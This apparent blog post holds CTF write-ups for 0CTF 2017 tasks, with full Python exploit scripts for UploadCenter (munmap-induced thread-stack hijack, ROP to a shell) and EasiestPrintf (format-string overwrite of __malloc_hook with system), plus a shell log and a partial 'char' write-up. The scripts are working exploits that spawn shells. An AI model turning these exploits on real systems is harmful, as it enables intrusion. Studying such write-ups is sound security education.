Monday, March 20, 2017

0CTF 2017 - UploadCenter (PWN 523)

Welcome to another Menu Chall right~
Here you can use any function as you wish
No more words , Let't begin
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File

UploadCenter was a small service (x86-64, Linux) that allowed you to upload PNG files and do nothing with them. Well, that's not entirely true - you could list them (it would show you their width/height and depth), remove them and spawn two kinds of threads (one would inform you about any new uploads - i.e. when you would upload a file it would tell you that you've uploaded a file; and the second one would just list all the files in a different thread).

The PNGs themselves were kept on a linked list, where each node would contain (in short) some basic information about the PNG, a pointer to mmap'ed memory where the PNG was placed, and the size of said mmap'ed memory area.

The critical parts of the task were related to three menu options: 2 (upload), 4 (delete) and 6 (monitor), so I'll focus on them.

Starting with the most boring one, 4 :) Delete File function removed the specified PNG from the linked list, unmapped the memory chunk and freed all the structures (PNG descriptor, list node). As far as I could tell it was correctly implemented, and for the sake of this write-up the most interesting part was the munmap call:

        munmap(i->mmap_addr, i->mmap_size);

Going to the next function, 6 :) Monitor File spawned a new thread, which (in an infinite loop) waited for a condition to be met (new file uploaded) and displayed a message. It basically boiled down to the following code:

  while ( !pthread_mutex_lock(&mutex) )
  {
    while ( !ev_file_added )
      pthread_cond_wait(&cond, &mutex);
    ...
    puts("New file uploaded, Please check");
    ...
  }
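For readers more at home in Python than in pthreads, the same wait-for-a-flag pattern can be sketched with threading.Condition. This is only an illustration of the pattern and not the service's code: the one-shot monitor() and the upload() helper are simplifications made up for this sketch.

```python
import threading

cond = threading.Condition()   # plays the role of both `mutex` and `cond`
ev_file_added = False
messages = []

def monitor():
    # Sleep until the flag is set; the thread does no work while it waits.
    with cond:
        while not ev_file_added:
            cond.wait()
        messages.append("New file uploaded, Please check")

def upload():
    # Hypothetical stand-in for the upload path: set the flag, wake the waiter.
    global ev_file_added
    with cond:
        ev_file_added = True
        cond.notify()

t = threading.Thread(target=monitor)
t.start()
upload()
t.join(timeout=5)
print(messages)
```

The point that matters later is that a thread parked in the wait call is simply asleep until somebody signals the condition.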

And the last, and most important part, was the 2 :) Upload and parse File function, which worked in the following way:

  1. It asked the user for a 32-bit word containing data size (limited at 1 MB).
  2. And then received that many bytes from the user.
  3. Then inflated (i.e. zlib decompressed) the data (limited at 32 MB).
  4. And did some simplistic PNG format parsing (which, apart from the width and height, could basically be ignored).
  5. After that it mmap'ed an area of size width * height (important!) and copied that amount of decompressed data there.
  6. And then it set entry->mmap_size to the size of decompressed data (so there was a mismatch between what was mapped, and what would be unmapped when deleting).

So actually what you could do (using functions 2 and 4) is unmap an adjacent area of memory to one of the PNG areas. But how to get code execution from that?
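To make the mismatch concrete, here is a small model of the upload steps. It is a sketch under a few assumptions: the function and constant names are invented, the page size is taken to be 4096, and sizes are rounded up to whole pages the way mmap/munmap treat lengths on Linux. The 8392704 value is the one used in the exploit at the end of this section.

```python
import zlib

PAGE = 4096                      # assumed page size
COMPRESSED_LIMIT = 1 << 20       # 1 MB limit on the uploaded (compressed) data
INFLATED_LIMIT = 32 << 20        # 32 MB limit on the decompressed data

def page_round(n):
    """Round n up to a whole number of pages."""
    return (n + PAGE - 1) // PAGE * PAGE

def simulate_upload(width, height, inflated):
    """Return (mapped_bytes, recorded_bytes) for one upload."""
    compressed = zlib.compress(inflated)
    assert len(compressed) <= COMPRESSED_LIMIT
    assert len(inflated) <= INFLATED_LIMIT
    mapped = page_round(width * height)   # step 5: mmap of width * height
    recorded = len(inflated)              # step 6: mmap_size = inflated size
    return mapped, recorded

STACK = 8392704  # 8 MB plus one 4 KB page, as used in the exploit

mapped, recorded = simulate_upload(1, STACK, b"A" * (2 * STACK))
extra = page_round(recorded) - mapped
print("mapped %d, recorded %d, extra bytes unmapped on delete: %d"
      % (mapped, recorded, extra))
```

Highly repetitive padding compresses to a tiny fraction of its size, which is why a 16 MB decompressed body fits comfortably under the 1 MB upload limit.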

At this moment I would like to recommend this awesome blogpost (kudos to mak for handing me a link during the CTF): http://tukan.farm/2016/07/27/munmap-madness/

The method I used is exactly what is described there, i.e.:

  1. I've allocated two 8 MB areas (i.e. uploaded two PNGs), where one area was described correctly as an 8 MB block and the other incorrectly as a 16 MB block.
  2. I've freed the correctly allocated one (i.e. deleted it from the list).
  3. And then I used option 6 to launch a new thread. The stack of the new thread was placed exactly in the place of the PNG I just unmapped.
  4. And then I've unmapped the second PNG, which actually unmapped the stack of the new thread as well (these areas were next to each other). Since the thread was asleep in pthread_cond_wait at that time, it didn't crash.
  5. At that moment it was enough to upload a new 8 MB PNG that contained the "new stack" (with ROP chain + some minor additions) for the new thread (upload itself would wake the thread) and the woken thread would eventually grab a return address from the now-controlled-by-us stack leading to code execution.

At that point my stage 1 ROP leaked the libc address (using puts to leak its own address from the .got table) and fetched stage 2 of ROP, which ran execve with /bin/sh. This was actually a little more tricky since the new thread and the main thread were racing to read data from stdin, which made part of my exploit always end up in the wrong place (and this misaligned the stack) - but it's nothing that cannot be fixed by running the exploit a couple of times.
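The stage 1 leak calls puts once per byte of the .got entry, because puts stops at the first NUL byte. Below is a minimal sketch of how the eight outputs can be glued back into a pointer. The fake_puts() helper and the example address are hypothetical; only the 0x06B990 offset comes from the exploit below. Note that a pointer containing a 0x0a byte would confuse any line-based splitting of the real output.

```python
import struct

PUTS_OFFSET = 0x06B990  # offset of puts in the remote libc (from the exploit)

def fake_puts(memory, offset):
    """Model puts(): bytes from offset up to (not including) the next NUL."""
    end = memory.index(0, offset)
    return memory[offset:end]

def rebuild_pointer(lines):
    """Rebuild a little-endian 64-bit value from eight per-byte outputs.

    lines[i] is what puts(addr + i) printed, without the trailing newline;
    an empty line means the byte at addr + i was zero.
    """
    raw = bytearray(line[0] if line else 0 for line in lines[:8])
    return struct.unpack("<Q", bytes(raw))[0]

leaked = 0x00007F12345AB990                  # hypothetical address of puts
got = struct.pack("<Q", leaked) + b"\x00"    # the .got slot plus a terminator
lines = [fake_puts(got, i) for i in range(8)]

puts_addr = rebuild_pointer(lines)
libc_base = puts_addr - PUTS_OFFSET
print("puts @ %#x, libc @ %#x" % (puts_addr, libc_base))
```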

And that's it. Full exploit code is available at the end of the post (I kept the nasty bits - i.e. debugging code, etc - in there for educational reasons... I guess).


 +--^----------,--------,-----,--------^-,
 | |||||||||   `--------'     |          O
 `+---------------------------^----------|
   `_,---------,---------,--------------'
     / XXXXXX /'|       /'
    / XXXXXX /  `    /'
   / XXXXXX /`-------'
  / XXXXXX /
 / XXXXXX /
(________(        007 James Bond
`------'
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
ls -la
total 84
drwxr-xr-x  22 root root  4096 Mar  9 11:42 .
drwxr-xr-x  22 root root  4096 Mar  9 11:42 ..
drwxr-xr-x   2 root root  4096 Mar  9 11:45 bin
drwxr-xr-x   3 root root  4096 Mar  9 11:48 boot
drwxr-xr-x  17 root root  2980 Mar  9 13:10 dev
drwxr-xr-x  85 root root  4096 Mar 19 14:12 etc
drwxr-xr-x   3 root root  4096 Mar 18 17:49 home
lrwxrwxrwx   1 root root    31 Mar  9 11:42 initrd.img -> /boot/initrd.img-3.16.0-4-amd64
drwxr-xr-x  14 root root  4096 Mar  9 11:43 lib
drwxr-xr-x   2 root root  4096 Mar  9 11:41 lib64
drwx------   2 root root 16384 Mar  9 11:40 lost+found
drwxr-xr-x   3 root root  4096 Mar  9 11:40 media
drwxr-xr-x   2 root root  4096 Mar  9 11:41 mnt
drwxr-xr-x   2 root root  4096 Mar  9 11:41 opt
dr-xr-xr-x 112 root root     0 Mar  9 13:10 proc
drwx------   4 root root  4096 Mar 19 14:12 root
drwxr-xr-x  17 root root   680 Mar 19 14:07 run
drwxr-xr-x   2 root root  4096 Mar  9 11:49 sbin
drwxr-xr-x   2 root root  4096 Mar  9 11:41 srv
dr-xr-xr-x  13 root root     0 Mar 17 21:12 sys
drwx-wx-wt   7 root root  4096 Mar 20 05:17 tmp
drwxr-xr-x  10 root root  4096 Mar  9 11:41 usr
drwxr-xr-x  11 root root  4096 Mar  9 11:41 var
lrwxrwxrwx   1 root root    27 Mar  9 11:42 vmlinuz -> boot/vmlinuz-3.16.0-4-amd64
cat /home/*/flag
flag{M3ybe_Th1s_1s_d1ffer3nt_UAF_Y0U_F1rst_S33n}

The exploit (you'll probably have to run it a couple of times):

#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvall() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvall() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def upload_file(s, fname):
  with open(fname, "rb") as f:
    d = f.read()

  return upload_string(s, d)

def png_header(magic, data):
  return ''.join([
    pack(">I", len(data)),
    magic,
    data,
    pack(">I", 0x41414141),  # CRC    
  ])

  
def make_png(w, h):
  return ''.join([
    "89504E470D0A1A0A".decode("hex"),  # Magic
    png_header("IHDR",
      pack(">IIBBBBB",
        w, h, 8, 2, 0, 0, 0  # 24-bit RGB
    )),
    png_header("IDAT", ""),
    png_header("IEND", ""),
  ])   


def upload_png(s, w, h, final_sz, padding="", pbyte="A"):
  png = make_png(w, h)
  while len(png) % 8 != 0:
    png += "\0"
  png += padding
  print len(png), final_sz
  png = png.ljust(final_sz, pbyte)
  png = png.encode("zlib")

  if len(png) > 1048576:
    print "!!!!!!! ZLIB: %i vs %i" % (len(png), 1048576)

  s.sendall("2\n")
  s.sendall(dd(len(png)))
  s.sendall(png)
  print s.recvuntil(MENU_LAST_LINE)

def upload_string(s, d):
  z = d.encode("zlib")
  s.sendall(dd(len(z)))
  s.sendall(z)

def upload_file_padded(s, fname, padding):
  with open(fname, "rb") as f:
    d = f.read()

  return upload_string(s, d + padding)

MENU_LAST_LINE = "6 :) Monitor File\n"
READ_INFO_LAST_LINE = "enjoy your tour\n"

def del_entry(s, n):
  s.sendall("4\n")
  s.sendall(str(n) + "\n")
  print s.recvuntil(MENU_LAST_LINE)

def spawn_monitor(s):
  s.sendall("6\n")
  print s.recvuntil(MENU_LAST_LINE)


def set_rdi(v):
  # 0x4038b1    pop rdi
  # 0x4038b2    ret
  return ''.join([
    dq(0x4038b1),
    dq(v)
  ])

def set_rsi_r15(rsi=0, r15=0):
  # 0x4038af    pop rsi
  # 0x4038b0    pop r15
  # 0x4038b2    ret
  return ''.join([
    dq(0x4038af),
    dq(rsi),
    dq(r15),    
  ])

def call_puts(addr):
  # 0400AF0
  return ''.join([
    set_rdi(addr),
    dq(0x0400AF0),
  ])

def call_read_bytes(addr, sz):
  # 400F14
  return ''.join([
    set_rdi(addr),
    set_rsi_r15(rsi=sz),
    dq(0x400F14),
  ])

def stack_pivot(addr):
  # 0x402ede    pop rsp
  # 0x402edf    pop r13
  # 0x402ee1    ret
  return ''.join([
    dq(0x402ede),
    dq(addr - 8)
  ])

def call_sleep(tm):
  return ''.join([
    set_rdi(tm),
    dq(0x400C30),
  ])


def go():  
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!

  
  print s.recvuntil(MENU_LAST_LINE)

  #s.sendall("1\n")
  #s.sendall("A" * 20)
  #s.sendall("1\n")
  #print s.recvuntil(READ_INFO_LAST_LINE)

  #s.sendall("0000000000000001A")
  #s.sendall("B" * 1)  # 2, 8
  #time.sleep(0.5)
  #s.sendall("1\n")
  #d = s.recvuntil(READ_INFO_LAST_LINE)
  #print d
  #sth = d.split(" , enjoy your tour")[0].split("Welcome Team ")[1]
  #print sth.encode("hex")


  upload_png(s, 10, 10, 0x1000)

  upload_png(s, 1, 8392704, 8392704) # 1
  upload_png(s, 1, 8392704, 8392704 + 8392704)
  del_entry(s, 1)

  spawn_monitor(s)

  del_entry(s, 1)
  
  # Now we hope that not all threads run.

  padding = []
  for i in range((8392704 - 128) / 8):  # ~1mln
    if i < 900000:
      padding.append(dq(0))
    else:
      padding.append(dq(0x4141414100000000 | i))

  padding[0xfffd9] = dq(0x0060E400)
  padding[0xfffda] = dq(0x0060E400)

  del padding[0xfffdd:]

  VER = 0x4098DC
  VER_STR = "1.2.8\n"

  CMD = "/bin/sh\0"
  #CMD = CMD.ljust(64, "\0")

  rop = ''.join([
    call_sleep(1),
    call_puts(VER),
    call_puts(0x060E028),
    call_puts(0x060E029),
    call_puts(0x060E02A),
    call_puts(0x060E02B),
    call_puts(0x060E02C),
    call_puts(0x060E02D),
    call_puts(0x060E02E),
    call_puts(0x060E02F),
    call_puts(VER),
    call_read_bytes(0x0060E400, 512 + len(CMD)),
    stack_pivot(0x0060E410)
  ])

  padding.append(rop)
  padding = ''.join(padding)

  #print "press enter to trigger"
  #raw_input()
  print "\x1b[1;33mTriggering!\x1b[m"
  upload_png(s, 1, 8392704, 8392704, padding)

  s.recvuntil(VER_STR)
  puts_libc = ''
  for x in s.recvuntil(VER_STR).splitlines():
    if len(x) == 0:
      puts_libc += "\0"
    else:
      puts_libc += x[0]
    if len(puts_libc) == 8:
      break

  puts_libc = rq(puts_libc)
  LIBC = puts_libc - 0x06B990
  print "LIBC: %x" % LIBC

  rop2 = ''.join([
    #dq(0x402ee1) * 16,  # nopsled
    dq(0x401363) * 16,
    set_rsi_r15(0x0060EF00, 0),
    set_rdi(0x0060E400 + 512),
    dq(LIBC+0xBA310), # execve
  ])

  rop2 = rop2.ljust(512, "\0")
  rop2 += CMD * 16

  s.sendall("PPPPPPPP" + rop2 + (" " * 16))
    

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  # Python console.
  # Note: you might need to modify ReceiverClass if you want
  #       to parse incoming packets.
  #ReceiverClass(s).start()
  #dct = locals()
  #for k in globals().keys():
  #  if k not in dct:
  #    dct[k] = globals()[k]
  #code.InteractiveConsole(dct).interact()

  s.close()

HOST = '202.120.7.216'
PORT = 12345
#HOST = '127.0.0.1'
#HOST = '192.168.2.218'
#PORT = 1234
go()



0CTF 2017 - EasiestPrintf (PWN 150)

The task, as the name implies, was a rather basic (at first glance - there was a plot twist) format string bug in a short 32-bit Debian application. The initial description of the task was:

---
Warm UP! A traditional Format String Attack.
202.120.7.210 12321

http://dl.0ops.net/EasiestPrintf
---

And it later was upgraded (without me noticing 😭; though in all fairness it didn't change much) to:

---
Warm UP! A traditional Format String Attack.
It's running on Debian 8.
nc 202.120.7.210 12321

http://dl.0ops.net/EasiestPrintf
http://dl.0ops.net/libc.so.6_0ed9bad239c74870ed2db31c735132ce
---

The code itself was rather simple and boiled down to the following steps:

  1. Turn off buffering for stdin/stdout/stderr and set up an alarm for one minute (a rather usual thing in CTF tasks).
  2. Manually randomize the stack address by doing a 16-byte aligned alloca().
  3. Get one decimal number (address) from the user and print in hexadecimal a 32-bit word from that address (an explicit leak).
  4. Read up to 159 bytes into a buffer on the stack (or up until \n was encountered, whichever came first) and do a printf(buffer) on it.
  5. Call exit(0) immediately after printf.

The manual ASLR from the second point could actually be ignored (at least I didn't find it annoying in any way) and the explicit leak from third point had to be used to leak the address of libc (or, to be more accurate, leak one of the addresses of resolved functions from .got and calculate the address of libc based on that).

While a link to libc was added later to the task description, I didn't notice until after I already solved the challenge, so I had to use the usual method of leaking 2-3 addresses from .got (in my case these were read, close and alarm) and look up the libc in our database of libcs (a good thing to have). This resulted in finding exactly one library that matched all three addresses (or rather all three 12-bit lowest parts of the addresses) and giving me exactly one libc. And exactly zero ld-linux.so.2, which meant I couldn't debug the application locally, but I didn't care that much either (if possible I prefer to solve the tasks straight on the challenge server - far fewer problems with differences in the environment).
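The lookup itself is simple: libraries are loaded at page-aligned addresses, so the lowest 12 bits of a leaked function address equal the lowest 12 bits of that function's offset inside the library. A rough sketch of such a lookup follows. The two-entry database and its names are made up for illustration; only the alarm offset (0xB6C70) and the base address are taken from the exploit and its log.

```python
def low12(value):
    """Page offset of an address (ASLR leaves these bits untouched)."""
    return value & 0xFFF

def find_libcs(database, leaks):
    """Names of all libcs whose symbol offsets agree with every leak."""
    hits = []
    for name, symbols in database.items():
        if all(low12(symbols[sym]) == low12(addr) for sym, addr in leaks.items()):
            hits.append(name)
    return hits

def libc_base(symbols, leaks):
    """Base address computed from any one leaked symbol."""
    sym, addr = next(iter(leaks.items()))
    return addr - symbols[sym]

# Hypothetical database; real ones hold symbol offsets for many libc builds.
DATABASE = {
    "libc-candidate-a": {"read": 0xD4350, "close": 0xD4B20, "alarm": 0xB6C70},
    "libc-candidate-b": {"read": 0xDAF60, "close": 0xDB710, "alarm": 0xB7C70},
}

BASE = 0xF75DE000
leaks = {sym: BASE + off for sym, off in DATABASE["libc-candidate-a"].items()}

one_leak = find_libcs(DATABASE, {"alarm": leaks["alarm"]})
all_leaks = find_libcs(DATABASE, leaks)
print(one_leak, all_leaks)
```

A single leak is often ambiguous (both made-up candidates share the low bits of alarm here), which is why leaking two or three functions is the usual practice.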

With the libc identified, all that was left was to create a format string which would overwrite the .got exit entry with the address of a ROP gadget that would pivot the stack to my buffer and thus launch a ROP chain that runs system("/bin/sh"). Done, right?

Wrong.

It turned out that .got was read-only.

This started a 3 hour long journey to find a way to overwrite something that will give me control over EIP. The fact that immediately after printf() returned exit() was called didn't make things easier. The things I tried on the way:

  • Destructor tables in main binary and libc - nope, read only.
  • The atexit list - nope, pointer encrypted, don't know the secret value.
  • stdout's function vector table - nope, read only (one thing I didn't try was to change the address of the vector table itself).
  • A few function pointers that might be called on exit in libc - nope, read only.
  • The return address of printf itself - nope, no idea where the stack is.

Finally I recalled that libc has memory allocation hooks (__malloc_hook, __free_hook, etc) which are pointers to functions that are called when malloc or free are invoked. Luckily these pointers were not encrypted (i.e. due to the nature of how these are used/set up by the programmer - global function pointers that are to be overwritten - they cannot be encrypted).

However, does printf really use malloc?

At first I thought about the $ positional markers - when glibc's printf implementation encounters them, it creates a copy of the arguments from the stack (it needs a lookup table, and the usual vararg accessing methods don't provide such an option). But it turned out it uses alloca() (i.e. on-stack allocation) to do it (snippet from glibc-2.19/stdio-common/vfprintf.c):


  /* Here starts the more complex loop to handle positional parameters.  */
do_positional: 
...
    /* Array with information about the needed arguments.  This has to
       be dynamically extensible.  */
    size_t nspecs = 0;
    /* A more or less arbitrary start value.  */
    size_t nspecs_size = 32 * sizeof (struct printf_spec);
    struct printf_spec *specs = alloca (nspecs_size);


But since I was already looking at printf's internals, I just grepped for "malloc" and "free" finding a couple of places where they are indeed called. The most promising one was related to the width specifier (you know, e.g. "%1234x" - 1234 is the width of the field) of any format field:


if (width >= sizeof (work_buffer) / sizeof (work_buffer[0]) - 32)
 {
   /* We have to use a special buffer.  The "32" is just a safe
      bet for all the output which is not counted in the width.  */
   size_t needed = ((size_t) width + 32) * sizeof (CHAR_T);
   if (__libc_use_alloca (needed))
     workend = (CHAR_T *) alloca (needed) + width + 32;
   else
     {
         workstart = (CHAR_T *) malloc (needed);


After both doing some experiments (looking when malloc is called and when it's not) and looking up this code within the libc binary, I found out that any width above 65535 - 32 actually causes a malloc (and then eventually a free) to be called. And that both the __malloc_hook and __free_hook are really called giving me EIP control.
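The relation between the field width and the allocation size can be written down directly from the quoted snippet. This is a small sketch with invented helper names; it assumes a 32-bit size_t and a one-byte CHAR_T, and the threshold is simply the value observed above, not something derived from the glibc sources.

```python
MASK32 = 0xFFFFFFFF
OBSERVED_THRESHOLD = 65535 - 32   # widths above this reached malloc in my tests

def needed_bytes(width, char_size=1):
    """Allocation size, following `needed` in the quoted snippet."""
    return ((width + 32) * char_size) & MASK32

def reaches_malloc(width):
    """True if the width is large enough to take the malloc path."""
    return width > OBSERVED_THRESHOLD

def width_for_request(size):
    """Field width that makes printf ask for exactly `size` bytes."""
    return (size - 32) & MASK32

example_width = width_for_request(0x20000)
print("%%%ds -> malloc(%#x)" % (example_width, needed_bytes(example_width)))
```

In other words, whoever controls the format string also controls the argument that the allocation hook receives.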

Initially I wanted to overwrite the __free_hook with a gadget that would pivot the stack to my buffer to launch a ROP chain, but it turned out it's rather hard to do that (or at least my experiments failed; might be that it was 4am though). 

So in the end I resorted to a method abusing the fact that __malloc_hook was actually called with the width (+32) as an argument, so I ended up doing the following:

  1. I've put "sh\0\0" in the main binary's .data section.
  2. Then I've overwritten __malloc_hook with the address of system.
  3. And triggered the whole thing by using a "%WIDTHs" tag, where WIDTH was the address of said "sh\0\0" minus 32.

A small problem was that the address of the third byte of __malloc_hook contained the \n character, which broke my write-byte-by-byte method (i.e. "%hhn"), but it was enough to switch to a write-a-word method for that specific place (so the upper byte of the word overwrites the problematic byte).
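The write planning, including the switch from "%hhn" to "%hn" around the newline, can be sketched as below. This is a Python 3 reconstruction of the idea rather than the exploit itself: the helper names are invented, while the addresses, the libc base and the first positional index (7) are the values from the exploit and its log.

```python
import struct

def has_newline(addr):
    return b"\n" in struct.pack("<I", addr)

def split_dword(where, what):
    """Split a 32-bit write into (address, value, size) pieces, using a
    2-byte write wherever the next byte's address would contain a newline."""
    pieces, i = [], 0
    while i < 4:
        if has_newline(where + i):
            raise ValueError("cannot address byte %d without a newline" % i)
        if i + 1 < 4 and has_newline(where + i + 1):
            pieces.append((where + i, (what >> (8 * i)) & 0xFFFF, 2))
            i += 2
        else:
            pieces.append((where + i, (what >> (8 * i)) & 0xFF, 1))
            i += 1
    return pieces

def pad_to(target, count, modulus):
    """Smallest positive padding so that (count + pad) % modulus == target."""
    pad = (target - count) % modulus
    return pad if pad else modulus

def build_format(writes, first_arg):
    """Addresses first, then one %<pad>c%<n>$hhn (or $hn) pair per write."""
    fmt = b"".join(struct.pack("<I", addr) for addr, _, _ in writes)
    count = len(fmt)
    for i, (_, value, size) in enumerate(writes):
        pad = pad_to(value, count, 1 << (8 * size))
        count += pad
        spec = "hhn" if size == 1 else "hn"
        fmt += ("%%%dc%%%d$%s" % (pad, first_arg + i, spec)).encode()
    return fmt

LIBC = 0xF75DE000
SYSTEM = LIBC + 0x3E3E0
MALLOC_HOOK = LIBC + 0x1A9408            # WHERE in the exploit
SH_ADDR = 0x804A04C                      # WHERE2 in the exploit
SH = struct.unpack("<I", b"sh\0\0")[0]

writes = split_dword(MALLOC_HOOK, SYSTEM) + split_dword(SH_ADDR, SH)
fmt = build_format(writes, first_arg=7)
print(fmt[28:].decode())
```

With the libc base from the log, the printed paddings (196, 24803, 52, ...) are the same numbers as in the second column of the exploit's debug output.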

And to my surprise, it worked on the first try (full exploit is at the end of the post):


gynvael:haven-windows> pwnbase.py
libc @  0xf75de000L
224 196 0xe0L
195 24803 0x61c3L
247 52 0x61f7L
224 124 0x6273
195 245 0x6368
97 152 0x6400
247 256 0x6500
120
Shell opened!
cat /home/EasiestPrintf/flag
flag{Dr4m471c_pr1N7f_45_y0u_Kn0w}


And that's it! I really liked this task, especially due to the plot twist with the read-only .got - it forced me to dig a little deeper than usual into the printf internals, which was pretty fun in the end.


P.S. Exploit (Python 2.7):


#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvall() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvall() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def go():
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!
  M1 = "Which address you wanna read:\n"
  s.recvuntil(M1)
  addr = 0x08049FD4  # alarm in .got
  s.sendall("%u\n" % addr)
  LIBC = int(s.recvuntil("\n").strip(), 16)
  LIBC -= 0xB6C70

  print "libc @ ", hex(LIBC)

  SYSTEM = LIBC + 0x3E3E0
  EBFE = LIBC + 0x24119  # Good for debugging.
  PUTS = 0x80485C0

  WHAT = SYSTEM
  WHERE = LIBC + 0x1A9408

  WHERE2 = 0x804A04C  # A writable address in .data.
  WHAT2 = rd("sh\0\0")

  fmt = ""
  fmt += dd(WHERE) + dd(WHERE+1) + dd(WHERE+3)
  fmt += dd(WHERE2) + dd(WHERE2+1) + dd(WHERE2+2) + dd(WHERE2+3)

  cnt = len(fmt)

  def getoffset(b, c):
    while c >= b:
      b += 256

    return b - c, b

  # First write (__malloc_hook with system).
  diff, cnt = getoffset(WHAT & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%7$hhn"

  diff, cnt = getoffset((WHAT >> 8) & 0xffff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%8$hn"

  diff, cnt = getoffset((WHAT >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%9$hhn"

  # Second write (.data address with "sh\0\0").
  diff, cnt = getoffset(WHAT2 & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%10$hhn"

  diff, cnt = getoffset((WHAT2 >> 8) & 0xff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%11$hhn"

  diff, cnt = getoffset((WHAT2 >> 16) & 0xff, cnt)
  print (WHAT >> 16) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%12$hhn"

  diff, cnt = getoffset((WHAT2 >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%13$hhn"  

  # Trigger the malloc, use addr of "sh\0\0" as width.
  fmt += "%" + str(WHERE2 - 32) + "s"

  # Padding to 4. Probably not needed.
  while (len(fmt) % 4) != 0:
    fmt += "|"

  print len(fmt)
  if '\n' in fmt:
    print "OOOOOOOOOPSSSSSS \\n in payload lol"
  s.sendall(fmt + "\n")
  s.sendall("echo -- it worked --\n")
  s.recvuntil("-- it worked --\n")
  print "Shell opened!"

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  s.close()

HOST = '202.120.7.210'
PORT = 12321
go()




0CTF 2017 - char (shellcoding 132)

The code in the "char" task was rather simple - you get to send in 2400 bytes of input (using scanf's "%2400s", so no whitespace characters allowed), then the input is checked for non-ASCII characters (control characters like newlines or tabs are rejected as well), and if it passes the check it is copied using strcpy to a waaay-too-small stack-based buffer, triggering a standard stack-based buffer overflow. Since the application was compiled with NX, ROP was the go-to solution.

One important detail is that the authors made it easier to solve by mapping a certain (provided) libc file directly into R-X memory starting at an ASCII-friendly address of 0x5555E000 - this was to be the main and only source of gadgets for this task.

So all that was left was to create an ASCII-friendly (w/o whitechars) ROP chain that gets either a shell or the flag directly. And it took me about an hour per controlled register (so ~5 hours total) to do it.
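"ASCII-friendly" is easy to test mechanically. The sketch below assumes the allowed byte range is 0x21 to 0x7e (printable ASCII without the space), which is my reading of the filter described above rather than something lifted from the binary; the sample values are addresses that appear later in this post.

```python
import struct

def is_ascii_friendly(value):
    """True if all four bytes of a 32-bit value are in the assumed
    allowed range 0x21..0x7e (printable, non-whitespace ASCII)."""
    return all(0x21 <= b <= 0x7E for b in struct.pack("<I", value))

samples = {
    0x5557506C: "pop ebx; pop esi; pop edi; pop ebp; ret gadget",
    0x5555E000: "base address of the mapped libc",
    0x5564CAF1: "int 0x80 gadget",
}
for value, what in samples.items():
    print("%#x %-5s %s" % (value, is_ascii_friendly(value), what))
```

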